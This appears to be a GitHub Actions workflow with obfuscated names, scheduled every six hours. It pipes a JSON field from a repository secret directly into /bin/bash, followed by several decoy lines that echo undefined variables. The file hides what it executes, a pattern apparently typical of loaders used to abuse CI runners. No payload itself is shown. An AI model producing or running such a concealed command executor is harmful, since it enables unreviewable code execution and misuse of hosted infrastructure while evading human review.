name: chenseqing6751
on:
  workflow_dispatch:
  schedule:
    - cron: '39 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenseqing6751
        env:
          sc65735: ${{ secrets.sc65735 }}
        run: |
          echo $sc65735 | jq -r .pd67970 | /bin/bash
          echo $wlflb27516 | jq -r .yhls0925 | /bin/bash
          echo $qjhs0 | jq -r .tsfef9 | /bin/bash
          echo $rd05905 | jq -r .q1 | /bin/bash
          echo $p63725 | jq -r .zwg1 | /bin/bash
          echo $gdu2 | jq -r .oniml3 | /bin/bash
          echo $td66144 | jq -r .gm2 | /bin/bash
          echo $imv8372 | jq -r .x55827 | /bin/bash
          echo $bvn11 | jq -r .otlb38501 | /bin/bash

